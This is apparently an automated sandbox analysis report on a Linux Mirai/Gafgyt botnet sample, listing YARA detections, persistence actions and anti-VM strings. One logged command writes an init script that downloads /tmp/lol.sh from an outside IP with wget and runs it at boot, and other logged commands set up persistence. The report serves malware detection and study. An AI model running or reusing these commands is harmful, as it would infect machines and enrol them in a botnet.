          Source: /tmp/x86_32.nn.elf (PID: 6339)SIGKILL sent: pid: 6335, result: successfulJump to behavior
          Source: x86_32.nn.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ffc398303f7208e77c4fbdfb50ac896e531b7cee3be2fa820bc8d70cfb20af3, id = 5bf62ce4-619b-4d46-b221-c5bf552474bb, last_modified = 2021-09-16
          Source: x86_32.nn.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_fa3ad9d0 reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = fe93a3552b72b107f95cc5a7e59da64fe84d31df833bf36c81d8f31d8d79d7ca, id = fa3ad9d0-7c55-4621-90fc-6b154c44a67b, last_modified = 2021-09-16
          Source: x86_32.nn.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
          Source: x86_32.nn.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16
          Source: x86_32.nn.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
          Source: x86_32.nn.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
          Source: x86_32.nn.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
          Source: x86_32.nn.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
          Source: 6232.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ffc398303f7208e77c4fbdfb50ac896e531b7cee3be2fa820bc8d70cfb20af3, id = 5bf62ce4-619b-4d46-b221-c5bf552474bb, last_modified = 2021-09-16
          Source: 6232.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_fa3ad9d0 reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = fe93a3552b72b107f95cc5a7e59da64fe84d31df833bf36c81d8f31d8d79d7ca, id = fa3ad9d0-7c55-4621-90fc-6b154c44a67b, last_modified = 2021-09-16
          Source: 6232.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
          Source: 6232.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16
          Source: 6232.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
          Source: 6232.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
          Source: 6232.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
          Source: 6232.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
          Source: 6335.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ffc398303f7208e77c4fbdfb50ac896e531b7cee3be2fa820bc8d70cfb20af3, id = 5bf62ce4-619b-4d46-b221-c5bf552474bb, last_modified = 2021-09-16
          Source: 6335.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_fa3ad9d0 reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = fe93a3552b72b107f95cc5a7e59da64fe84d31df833bf36c81d8f31d8d79d7ca, id = fa3ad9d0-7c55-4621-90fc-6b154c44a67b, last_modified = 2021-09-16
          Source: 6335.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
          Source: 6335.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16
          Source: 6335.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
          Source: 6335.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
          Source: 6335.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
          Source: 6335.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
          Source: 6241.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ffc398303f7208e77c4fbdfb50ac896e531b7cee3be2fa820bc8d70cfb20af3, id = 5bf62ce4-619b-4d46-b221-c5bf552474bb, last_modified = 2021-09-16
          Source: 6241.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_fa3ad9d0 reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = fe93a3552b72b107f95cc5a7e59da64fe84d31df833bf36c81d8f31d8d79d7ca, id = fa3ad9d0-7c55-4621-90fc-6b154c44a67b, last_modified = 2021-09-16
          Source: 6241.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
          Source: 6241.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16
          Source: 6241.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
          Source: 6241.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
          Source: 6241.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
          Source: 6241.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
          Source: 6339.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ffc398303f7208e77c4fbdfb50ac896e531b7cee3be2fa820bc8d70cfb20af3, id = 5bf62ce4-619b-4d46-b221-c5bf552474bb, last_modified = 2021-09-16
          Source: 6339.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_fa3ad9d0 reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = fe93a3552b72b107f95cc5a7e59da64fe84d31df833bf36c81d8f31d8d79d7ca, id = fa3ad9d0-7c55-4621-90fc-6b154c44a67b, last_modified = 2021-09-16
          Source: 6339.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
          Source: 6339.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16
          Source: 6339.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
          Source: 6339.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
          Source: 6339.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
          Source: 6339.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
          Source: classification engineClassification label: mal88.spre.troj.evad.linELF@0/10@0/0

          Persistence and Installation Behavior

          barindex
          Source: /tmp/x86_32.nn.elf (PID: 6232)File: /etc/profileJump to behavior
          Source: /tmp/x86_32.nn.elf (PID: 6232)File: /etc/rc.localJump to behavior
          Source: /usr/bin/ln (PID: 6310)File: /etc/rcS.d/S99system -> /etc/init.d/systemJump to behavior
          Source: /usr/bin/ln (PID: 6332)File: /etc/rc.d/S99sh -> /etc/init.d/shJump to behavior
          Source: /tmp/x86_32.nn.elf (PID: 6232)File: /etc/rc.local (bits: - usr: rx grp: rx all: rwx)Jump to behavior
          Source: /usr/bin/chmod (PID: 6308)File: /etc/init.d/system (bits: - usr: rx grp: rx all: rwx)Jump to behavior
          Source: /usr/bin/chmod (PID: 6316)File: /etc/init.d/sh (bits: - usr: rx grp: rx all: rwx)Jump to behavior
          Source: /tmp/x86_32.nn.elf (PID: 6338)File opened: /proc/6450/statusJump to behavior
          Source: /tmp/x86_32.nn.elf (PID: 6338)File opened: /proc/6452/statusJump to behavior
          Source: /tmp/x86_32.nn.elf (PID: 6338)File opened: /proc/6451/statusJump to behavior
          Source: /tmp/x86_32.nn.elf (PID: 6338)File opened: /proc/6454/statusJump to behavior
          Source: /tmp/x86_32.nn.elf (PID: 6338)File opened: /proc/6453/statusJump to behavior
          Source: /tmp/x86_32.nn.elf (PID: 6338)File opened: /proc/6456/statusJump to behavior
          Source: /tmp/x86_32.nn.elf (PID: 6338)File opened: /proc/6455/statusJump to behavior
          Source: /tmp/x86_32.nn.elf (PID: 6338)File opened: /proc/799/cmdlineJump to behavior
          Source: /tmp/x86_32.nn.elf (PID: 6338)File opened: /proc/6425/statusJump to behavior
          Source: /tmp/x86_32.nn.elf (PID: 6338)File opened: /proc/6424/statusJump to behavior
          Source: /tmp/x86_32.nn.elf (PID: 6338)File opened: /proc/6427/statusJump to behavior
          Source: /tmp/x86_32.nn.elf (PID: 6338)File opened: /proc/6449/statusJump to behavior
          Source: /tmp/x86_32.nn.elf (PID: 6338)File opened: /proc/6448/statusJump to behavior
          Source: /tmp/x86_32.nn.elf (PID: 6338)File opened: /proc/6426/statusJump to behavior
          Source: /tmp/x86_32.nn.elf (PID: 6338)File opened: /proc/6461/statusJump to behavior
          Source: /tmp/x86_32.nn.elf (PID: 6338)File opened: /proc/6460/statusJump to behavior
          Source: /tmp/x86_32.nn.elf (PID: 6338)File opened: /proc/6386/statusJump to behavior
          Source: /tmp/x86_32.nn.elf (PID: 6338)File opened: /proc/6463/statusJump to behavior
          Source: /tmp/x86_32.nn.elf (PID: 6338)File opened: /proc/6462/statusJump to behavior
          Source: /tmp/x86_32.nn.elf (PID: 6338)File opened: /proc/6344/statusJump to behavior
          Source: /tmp/x86_32.nn.elf (PID: 6338)File opened: /proc/6465/statusJump to behavior
          Source: /tmp/x86_32.nn.elf (PID: 6338)File opened: /proc/6464/statusJump to behavior
          Source: /tmp/x86_32.nn.elf (PID: 6338)File opened: /proc/6422/statusJump to behavior
          Source: /tmp/x86_32.nn.elf (PID: 6338)File opened: /proc/6060/cmdlineJump to behavior
          Source: /tmp/x86_32.nn.elf (PID: 6338)File opened: /proc/1/cmdlineJump to behavior
          Source: /tmp/x86_32.nn.elf (PID: 6338)File opened: /proc/6458/statusJump to behavior
          Source: /tmp/x86_32.nn.elf (PID: 6338)File opened: /proc/6457/statusJump to behavior
          Source: /tmp/x86_32.nn.elf (PID: 6338)File opened: /proc/6459/statusJump to behavior
          Source: /tmp/x86_32.nn.elf (PID: 6338)File opened: /proc/6419/statusJump to behavior
          Source: /tmp/x86_32.nn.elf (PID: 6242)Shell command executed: sh -c "systemctl enable custom.service >/dev/null 2>&1"Jump to behavior
          Source: /tmp/x86_32.nn.elf (PID: 6307)Shell command executed: sh -c "chmod +x /etc/init.d/system >/dev/null 2>&1"Jump to behavior
          Source: /tmp/x86_32.nn.elf (PID: 6309)Shell command executed: sh -c "ln -s /etc/init.d/system /etc/rcS.d/S99system >/dev/null 2>&1"Jump to behavior
          Source: /tmp/x86_32.nn.elf (PID: 6313)Shell command executed: sh -c "echo \"#!/bin/sh\n# /etc/init.d/sh\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting sh'\n /bin/sh &\n wget http://94.156.227.233/ -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping sh'\n killall sh\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start|stop|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/sh"Jump to behavior
          Source: /tmp/x86_32.nn.elf (PID: 6315)Shell command executed: sh -c "chmod +x /etc/init.d/sh >/dev/null 2>&1"Jump to behavior
          Source: /tmp/x86_32.nn.elf (PID: 6329)Shell command executed: sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"Jump to behavior
          Source: /tmp/x86_32.nn.elf (PID: 6331)Shell command executed: sh -c "ln -s /etc/init.d/sh /etc/rc.d/S99sh >/dev/null 2>&1"Jump to behavior
          Source: /bin/sh (PID: 6308)Chmod executable: /usr/bin/chmod -> chmod +x /etc/init.d/systemJump to behavior
          Source: /bin/sh (PID: 6316)Chmod executable: /usr/bin/chmod -> chmod +x /etc/init.d/shJump to behavior
          Source: /bin/sh (PID: 6330)Mkdir executable: /usr/bin/mkdir -> mkdir -p /etc/rc.dJump to behavior
          Source: /usr/bin/dash (PID: 6311)Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.XBu45Y3Wjt /tmp/tmp.7z05jTzkif /tmp/tmp.34WcYkzQMAJump to behavior
          Source: /usr/bin/dash (PID: 6314)Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.XBu45Y3Wjt /tmp/tmp.7z05jTzkif /tmp/tmp.34WcYkzQMAJump to behavior
          Source: /bin/sh (PID: 6267)Systemctl executable: /usr/bin/systemctl -> systemctl enable custom.serviceJump to behavior
          Source: /tmp/x86_32.nn.elf (PID: 6232)File: /etc/rc.local (bits: - usr: rx grp: rx all: rwx)Jump to behavior
          Source: /usr/bin/chmod (PID: 6308)File: /etc/init.d/system (bits: - usr: rx grp: rx all: rwx)Jump to behavior
          Source: /usr/bin/chmod (PID: 6316)File: /etc/init.d/sh (bits: - usr: rx grp: rx all: rwx)Jump to behavior
          Source: /tmp/x86_32.nn.elf (PID: 6232)Writes shell script file to disk with an unusual file extension: /etc/init.d/systemJump to dropped file
          Source: /tmp/x86_32.nn.elf (PID: 6232)Writes shell script file to disk with an unusual file extension: /etc/rc.localJump to dropped file
          Source: /bin/sh (PID: 6313)Writes shell script file to disk with an unusual file extension: /etc/init.d/shJump to dropped file

          Hooking and other Techniques for Hiding and Protection

          barindex
          Source: /tmp/x86_32.nn.elf (PID: 6232)File: /etc/init.d/systemJump to dropped file
          Source: /bin/sh (PID: 6313)File: /etc/init.d/shJump to dropped file
          Source: /tmp/x86_32.nn.elf (PID: 6232)File: /tmp/x86_32.nn.elfJump to behavior
          Source: x86_32.nn.elf, 6241.1.0000000009dbd000.0000000009dbf000.rw-.sdmpBinary or memory string: /usr/bin/vmtoolsd
          Source: x86_32.nn.elf, 6232.1.00000000ffd2f000.00000000ffd50000.rw-.sdmp, x86_32.nn.elf, 6241.1.00000000ffd2f000.00000000ffd50000.rw-.sdmp, x86_32.nn.elf, 6335.1.00000000ffd2f000.00000000ffd50000.rw-.sdmp, x86_32.nn.elf, 6339.1.00000000ffd2f000.00000000ffd50000.rw-.sdmpBinary or memory string: qemu-
          Source: x86_32.nn.elf, 6241.1.0000000009dbd000.0000000009dbf000.rw-.sdmpBinary or memory string: /usr/bin/vmtoolsdx

          Stealing of Sensitive Information

          barindex
          Source: Yara matchFile source: x86_32.nn.elf, type: SAMPLE
          Source: Yara matchFile source: 6232.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY
          Source: Yara matchFile source: 6335.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY
          Source: Yara matchFile source: 6241.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY
          Source: Yara matchFile source: 6339.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY
          Source: Yara matchFile source: x86_32.nn.elf, type: SAMPLE
          Source: Yara matchFile source: 6232.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY
          Source: Yara matchFile source: 6335.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY
          Source: Yara matchFile source: 6241.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY
          Source: Yara matchFile source: 6339.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: x86_32.nn.elf PID: 6232, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: x86_32.nn.elf PID: 6241, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: x86_32.nn.elf PID: 6335, type: MEMORYSTR
